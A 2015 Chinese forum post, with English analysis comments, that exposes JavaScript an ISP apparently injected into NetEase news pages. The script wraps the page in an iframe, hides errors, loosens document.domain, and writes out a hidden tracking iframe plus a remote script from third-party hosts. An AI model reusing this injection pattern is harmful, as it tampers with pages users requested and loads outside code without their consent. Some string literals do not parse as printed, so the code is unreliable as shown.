本帖最后由 hudba 于 2015-2-3 00:56 编辑
上网易看新闻半天打不开,发现状态栏显示正在访问一个奇怪的域名。心里一惊,难道电脑中毒了?赶紧查看源代码,发现页面后面被加了一段js,真正的新闻内容被放进了iframe。
接下来就是去搜索这个域名,发现v2ex里面也有人遇到这个问题,原来是运营商搞的鬼。
https://www.google.com/search?q=info.hfjuki.com&ie=utf-8&oe=utf-8
http://www.v2ex.com/t/142197
顺便查下ip138:
这是那段js里面的代码,好像是个半成品,还没写入广告数据:
/**
 * Returns the query portion of the URL this script was loaded from.
 *
 * The loader <script> element is located with getMainJs(); the text of its
 * src starting three characters after the ".js?" match (i.e. from the "?")
 * is returned.
 *
 * Analysis note: when no loader element is found the page is reloaded, but
 * execution still continues to the `.src` access on null, which throws.
 *
 * @returns {string} Tail of the loader URL beginning at "?".
 */
function locationSearch() {
  var loader = getMainJs();
  if (loader == null) {
    location.reload();
  }
  var loaderUrl = loader.src;
  var queryStart = loaderUrl.indexOf(".js?") + 3;
  return loaderUrl.substring(queryStart, loaderUrl.length);
}
/**
 * Extracts the value of one query parameter from a "?a=1&b=2"-style string
 * using manual substring arithmetic.
 *
 * @param {string} name    Parameter name to look up.
 * @param {string} paraStr String containing a "?" followed by the query.
 * @returns {string} The raw value, or the literal text "No such parameter"
 *                   when "&name=" is not present.
 *
 * Analysis notes:
 * - The value is returned as-is: nothing here URL-decodes or validates it.
 *   executeHtmlContext() later concatenates these values into markup that is
 *   passed to document.write().
 * - A missing parameter is reported with an in-band sentinel string, so
 *   callers cannot tell it apart from a real value of the same text.
 */
function getParameter(name, paraStr) {
  var result = "";
  // Prefix "&" so the first parameter can be matched as "&name=" too.
  // If paraStr has no "?", split()[1] is undefined and str becomes "&undefined".
  var str = "&" + paraStr.split("?")[1];
  var paraName = "&" + name + "=";
  if (str.indexOf(paraName) != -1) {
    // NOTE(review): this looks up the bare name, not "&name=", so the first
    // occurrence of the name anywhere in the string decides which branch
    // runs; it is not necessarily the parameter matched above.
    if (str.substring(str.indexOf(name), str.length).indexOf("&") != -1) {
      var TmpStr = str.substring(str.indexOf(paraName), str.length);
      // Length is derived from the position of the next "&" after the
      // leading one; when there is none, indexOf yields -1 and the
      // computed length is 0.
      result = TmpStr.substr(TmpStr.indexOf(paraName), TmpStr.substring(
          1, TmpStr.length).indexOf("&")
          - TmpStr.indexOf(paraName) + 1);
    } else {
      result = str.substring(str.indexOf(paraName), str.length);
    }
    // Keep only what follows the first "=".
    result = result.substring(result.indexOf("=") + 1, result.length);
  } else {
    result = "No such parameter";
  }
  // String.replace with a string pattern removes only the first "&".
  return (result.replace("&", ""));
}
/**
 * Finds the <script> element that loaded this code.
 *
 * Scans every script element in document order and returns the first one
 * whose src contains the substring "t_c".
 *
 * @returns {?Object} The matching script element, or null if none matches.
 */
function getMainJs() {
  var candidates = document.getElementsByTagName("script");
  for (var idx = 0; idx < candidates.length; idx += 1) {
    var candidate = candidates[idx];
    // The element is compared with the *string* "undefined", as in the
    // captured code; NOTE(review): presumably a typeof check was intended.
    if (candidate != "undefined" && candidate.src.indexOf("t_c") != -1) {
      return candidate;
    }
  }
  return null;
}
/**
 * Appends a "key=value" fragment to a URL string.
 *
 * "&" is used as the separator when the URL already contains a "?" at any
 * position after the first character; otherwise "?" is used. Not called
 * anywhere in the code shown on this page.
 *
 * @param {string} oStr URL to extend.
 * @param {string} aStr Fragment to append.
 * @returns {string} The extended URL.
 */
function appendParam(oStr, aStr) {
  // `> 0` (not `>= 0`): a string that *starts* with "?" gets a second "?".
  var separator = oStr.indexOf('?') > 0 ? "&" : "?";
  return oStr + separator + aStr;
}
// Replace whatever global error handler the page had with an empty function.
// NOTE(review): presumably meant to keep errors raised by this injected
// script from surfacing to the user; confirm. The handler returns nothing.
window.onerror = function() {
};

// Counts how often setTcTitle() has re-armed itself; the empty-title retry
// in setTcTitle() stops once this reaches 5.
var g_titleTime = 0;
/**
 * Copies the title of the framed page (frame/element id "cn") onto the
 * wrapper document, so the browser shows the title of the page the user
 * asked for, then reveals the ad container via setTcAdvVisible().
 *
 * Re-arms itself once per second while the frame's title is unavailable,
 * up to the g_titleTime limit of 5.
 */
function setTcTitle() {
  if (undefined == document) {
    g_titleTime++;
    // String argument: setTimeout evaluates it as code in the global scope.
    setTimeout("setTcTitle();", 1000);
    return;
  }

  var doc;
  try {
    // document.all / document.frames is the legacy Internet Explorer path.
    if (document.all) {
      doc = document.frames["cn"].document;
    } else {
      doc = document.getElementById("cn").contentDocument;
    }
  } catch (ex) {
    // Any failure to reach the frame's document is swallowed; doc stays
    // undefined and the retry branch below handles it.
  }

  if (g_titleTime < 5
      && (undefined == doc || undefined == doc.title || "" == doc.title)) {
    // Title not readable yet: try again in one second.
    g_titleTime++;
    setTimeout("setTcTitle();", 1000);
    return;
  } else if (undefined != doc && undefined != doc.title && "" != doc.title) {
    // Mirror the framed page's title on the wrapper, then show the ad box.
    document.title = doc.title;
    setTcAdvVisible();
  }
}
// Start the title-polling loop one second after this script runs. The
// string form of setTimeout is evaluated as code in the global scope.
setTimeout("setTcTitle();", 1000);

// Latch read and set by setTcAdvVisible() so the "addiv" element is
// revealed only once.
var g_isHaveVisible = false;
/**
 * Makes the element with id "addiv" visible, once.
 *
 * Does nothing when the element is missing or when g_isHaveVisible is
 * already set; otherwise sets visibility/display on the element and sets
 * the g_isHaveVisible latch.
 */
function setTcAdvVisible() {
  if (undefined == document) {
    return;
  }
  var adBox = document.getElementById("addiv");
  if (undefined == adBox || g_isHaveVisible) {
    return;
  }
  adBox.style.visibility = 'visible';
  adBox.style.display = 'block';
  g_isHaveVisible = true;
}
/**
 * Holder for the values parsed from the loader script's query string.
 *
 * Starts with divda, tctype, radius and rlu set to empty strings;
 * initParameters() fills them in and adds address and usagent.
 *
 * @constructor
 */
function UrlAnalyzer() {
  var fieldNames = ["divda", "tctype", "radius", "rlu"];
  for (var i = 0; i < fieldNames.length; i++) {
    this[fieldNames[i]] = "";
  }
}
/**
 * Reads the loader script's query string and stores six of its parameters
 * on this object.
 *
 * Every value comes straight from getParameter(): nothing is decoded or
 * validated, and a missing parameter yields that function's sentinel text.
 * Note the spelling difference: query parameter "lruedct" is stored as rlu.
 */
UrlAnalyzer.prototype.initParameters = function() {
  var query = locationSearch();
  // [property on this, query parameter name], in the original assignment order.
  var bindings = [
    ["rlu", "lruedct"],
    ["divda", "divda"],
    ["radius", "radius"],
    ["tctype", "tctype"],
    ["address", "address"],
    ["usagent", "usagent"]
  ];
  for (var i = 0; i < bindings.length; i++) {
    this[bindings[i][0]] = getParameter(bindings[i][1], query);
  }
};
/**
 * Returns the document of the frame with id/name "cn", which holds the page
 * the user actually requested.
 *
 * Uses document.frames when document.all exists (legacy Internet Explorer)
 * and contentDocument otherwise. Any exception raised while reaching into
 * the frame is swallowed.
 *
 * @returns {Object|undefined} The frame's document, or undefined on failure.
 */
UrlAnalyzer.prototype.getHtmlDoc = function() {
  var frameDoc;
  try {
    frameDoc = document.all
        ? document.frames["cn"].document
        : document.getElementById("cn").contentDocument;
  } catch (ignored) {
    // Deliberately empty: callers treat undefined as "not readable yet".
  }
  return frameDoc;
};
/**
 * Fallback used when the framed page's title could not be read: shortens
 * document.domain by its leftmost label and then retries copying the title.
 *
 * Runs only while the wrapper's own title is still empty.
 *
 * Analysis note: assigning a parent domain to document.domain relaxes the
 * same-origin check for this document.
 * NOTE(review): presumably this is done so the wrapper can script the "cn"
 * frame; confirm against the framed page's own document.domain handling.
 */
UrlAnalyzer.prototype.setDomain = function() {
  if (undefined != document.title && "" == document.title)
  {
    var index = document.domain.indexOf(".");
    // indexOf always returns a number, so only the -1 test is effective.
    if (undefined != index && -1 != index) {
      // Drop everything up to and including the first "." of the host name.
      document.domain = document.domain.substring(index + 1,
          document.domain.length);
    }

    var doc = this.getHtmlDoc();
    if (undefined != doc && undefined != doc.title && "" != doc.title) {
      // Mirror the framed page's title on the wrapper, then show the ad box.
      document.title = doc.title;
      setTcAdvVisible();
    }
  }
}
/**
 * Load handler for the "cn" frame (attached in executeHtmlContext()).
 *
 * If the frame's title can be read, it is copied to the wrapper document and
 * the ad container is revealed. If not, setDomain() is scheduled one second
 * later as a fallback.
 */
UrlAnalyzer.prototype.iframeCallback = function() {
  var doc = this.getHtmlDoc();
  if (undefined == doc || undefined == doc.title || "" == doc.title) {
    if (undefined != document.domain) {
      var self = this;
      // The null argument is unused: setDomain takes no parameters.
      setTimeout(function(){self.setDomain.call(self, null)}, 1000);
      // Commented-out inline copy of setDomain()'s body, kept as captured:
      // var index = document.domain.indexOf(".");
      // if (undefined != index && -1 != index) {
      // document.domain = document.domain.substring(index + 1,
      // document.domain.length);
      // }
      //
      // var doc = this.getHtmlDoc();
      // if (undefined != doc && undefined != doc.title && "" !=
      // doc.title) {
      // document.title = doc.title;
      // setTcAdvVisible();
      // }
    }
  } else if (undefined != doc && undefined != doc.title && "" != doc.title) {
    document.title = doc.title;
    setTcAdvVisible();
  }
}
/**
 * Writes the tracking and ad-loading markup into the wrapper page and hooks
 * the load event of the "cn" frame.
 *
 * Two elements are emitted with document.write():
 *  - a hidden iframe pointing at the statistics URL on info.hfjuki.com:8060,
 *    carrying advId, rd, tctype, address and usagent;
 *  - a <script> loaded from c2.sxite.com:8060/center with advId, radius and
 *    area=1.
 *
 * Analysis notes:
 *  - Every interpolated value comes from the loader script's query string
 *    (see initParameters) and is concatenated without escaping into markup
 *    that document.write() parses.
 *  - "tctype=" is filled from this.divda; this.tctype and this.rlu are not
 *    used here.
 *  - Both URLs are plain http.
 *  - NOTE(review): the two string literals with nested double quotes do not
 *    parse as printed; the backslash escapes were apparently lost when the
 *    forum rendered the post. They are kept exactly as captured.
 */
UrlAnalyzer.prototype.executeHtmlContext = function() {
  var staUrl = "http://info.hfjuki.com:8060/page/statistics?advId=" + this.divda
      + "&rd=" + this.radius + "&tctype=" + this.divda + "&address=" + this.address + "&usagent=" + this.usagent;

  var htmlStr = "<iframe src="" + staUrl
      + "" style="display:none"></iframe>";

  var advUrl = htmlStr
      + "<script src="http://c2.sxite.com:8060/center?advId="
      + this.divda + "&radius=" + this.radius + "&area=1" + ""><\/script>";
  document.write(advUrl);
  var self = this;
  var iframe = document.getElementById("cn");
  // attachEvent is the legacy Internet Explorer event API.
  if (iframe.attachEvent) {
    iframe.attachEvent("onload", function() {
      self.iframeCallback.call(self, null);
    });
  } else {
    iframe.onload = function() {
      self.iframeCallback.call(self, null);
    }
  }
}
/**
 * Entry point of the injected script.
 *
 * Points the "cn" frame's window at the frame's own src, then parses the
 * loader parameters and writes the tracking/ad markup.
 */
UrlAnalyzer.prototype.executeMain = function() {
  var contentFrame = document.getElementById("cn");
  // Navigate the frame to the URL already given in its src attribute.
  contentFrame.contentWindow.location.href = contentFrame.src;
  this.initParameters();
  this.executeHtmlContext();
};
// Runs immediately when the injected script is parsed: build the analyzer and
// start the wrapper logic.
// NOTE(review): a script like this can only be added to a page that can be
// modified in transit; pages served over HTTPS do not give an in-path party
// that opportunity.
var g_analyzer = new UrlAnalyzer();
g_analyzer.executeMain();